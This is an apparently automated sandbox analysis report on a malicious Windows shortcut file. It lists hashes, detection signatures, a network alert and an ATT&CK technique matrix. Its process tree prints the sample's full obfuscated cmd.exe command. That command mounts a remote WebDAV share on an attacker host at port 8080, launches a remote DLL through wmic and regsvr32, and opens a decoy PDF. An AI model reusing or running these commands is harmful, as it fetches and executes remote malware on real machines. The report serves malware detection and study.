Windows
Analysis Report
daHTg2LQmU.lnk
Overview
General Information
Sample name: | daHTg2LQmU.lnk (renamed because the original name is a hash value) |
Original sample name: | 26a989ca3cc6222e3980b874a247112e.lnk |
Analysis ID: | 1581576 |
MD5: | 26a989ca3cc6222e3980b874a247112e |
SHA1: | df7f39d5e475ed6d61055d4a8160b9b6c5348dfa |
SHA256: | 44aa68bbf2c5d018346fdfc21ba1d419f80921c8436778e4baeafbfb40aa6eeb |
Tags: | lnkuser-abuse_ch |
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Gathers information about network shares
Machine Learning detection for sample
Obfuscated command line found
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 6680, cmdline: "C:\Windows\System32\cmd.exe" /v /c "set RQXjD6fW=s^e&& !RQXjD6fW!t "MCYt=3" &&!RQXjD6fW!t "efzo=8" &&!RQXjD6fW!t "ftZA=t" &&!RQXjD6fW!t "TTzp=i" &&!RQXjD6fW!t "chTu=m" &&!RQXjD6fW!t "hGQK=s" &&!RQXjD6fW!t "rluF=a" &&!RQXjD6fW!t "XBYZ=l" &&!RQXjD6fW!t "fcfQ=v" &&!RQXjD6fW!t "YeJz=e" &&!RQXjD6fW!t "xrnc=o" &&!RQXjD6fW!t "MQiS=c" &&!RQXjD6fW!t "orMz=r" &&!RQXjD6fW!t "G4JhJXG1=\\fina!ftZA!!TTzp!ck.co!chTu!@!efzo!080\doc!hGQK!\" && c!rluF!!XBYZ!l !RQXjD6fW!t "ze7Pw47M=Acti!fcfQ!!YeJz!P!xrnc!d.o!MQiS!x" && net us!YeJz! !G4JhJXG1! && wm!TTzp!!MQiS! proc!YeJz!!hGQK!s c!rluF!l!XBYZ! c!orMz!e!rluF!!ftZA!!YeJz! "!orMz!!YeJz!gs!fcfQ!!orMz!!MCYt!2 /!hGQK! /i !G4JhJXG1!!ze7Pw47M!" && st!rluF!r!ftZA! !G4JhJXG1!Crypto.pdf ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6700, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - net.exe (PID: 6872, cmdline: net use \\finatick.com@8080\docs\, MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- cleanup
No configs have been found
No yara matches
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-28T09:29:44.833701+0100 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 65.20.104.212 | 8080 | TCP |
AV Detection |
---|
Source: | Virustotal: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Networking |
---|
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Classification label: |
Source: | File read: |
Source: | Key opened: |
Source: | Virustotal: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Section loaded: |
Data Obfuscation |
---|
Source: | Process created: |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | Thread sleep time: |
Source: | Last function: |
Source: | Binary or memory string: |
Source: | Binary or memory string: |
Source: | Process created: |
Source: | Process created: |
Stealing of Sensitive Information |
---|
Source: | Process created: |
Source: | Process created: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | 1 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |